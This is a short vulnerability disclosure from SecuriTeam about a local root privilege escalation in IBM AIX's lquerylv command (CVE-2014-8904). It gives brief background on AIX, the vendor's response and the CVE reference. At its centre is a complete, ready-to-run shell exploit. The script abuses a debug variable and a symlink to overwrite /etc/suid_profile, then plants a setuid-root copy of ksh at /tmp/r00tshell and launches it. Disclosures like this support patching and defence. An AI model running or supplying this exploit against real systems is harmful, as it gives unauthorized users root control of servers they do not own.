SecuriTeam Secure Disclosure
SecuriTeam Secure Disclosure (SSD) provides the support you need to turn your experience uncovering security vulnerabilities into a highly paid career. SSD was designed by researchers for researchers and will give you the fast response and great support you need to make top dollar for your discoveries.
Introduction
AIX (Advanced Interactive eXecutive) is a series of proprietary Unix operating systems developed and sold by IBM for several of its computer platforms. Originally released for the IBM 6150 RISC workstation, AIX now supports or has supported a wide variety of hardware platforms, including the IBM RS/6000 series and later POWER and PowerPC-based systems, IBM System i, System/370 mainframes, PS/2 personal computers, and the Apple Network Server.
Vulnerability Details
The running of lquerylv command with variable DBGCMD_LQUERYLV set may allow a local user to gain root privileges.
Exploit
#!/bin/sh # # From file writing to command execution # Tested on AIX 7.1 # export _DBGCMD_LQUERYLV=1 umask 0000 ln -s /etc/suid_profile /tmp/DEBUGCMD /usr/sbin/lquerylv cat << EOF >/etc/suid_profile cp /bin/ksh /tmp/r00tshell /usr/bin/syscall setreuid 0 0 chown root:system /tmp/r00tshell chmod 6755 /tmp/r00tshell EOF /opt/IBMinvscout/bin/invscoutClient_VPD_Survey # Any SUID root binaries with execve(), or system() echo "[!] Remove the /etc/suid_profile!" /tmp/r00tshell
Vendor Response
IBM has released an advisory and a patch for AIX servers: AIX cmdlvm vulnerability.
CVE
One CVE entry has been released for this vulnerability: CVE-2014-8904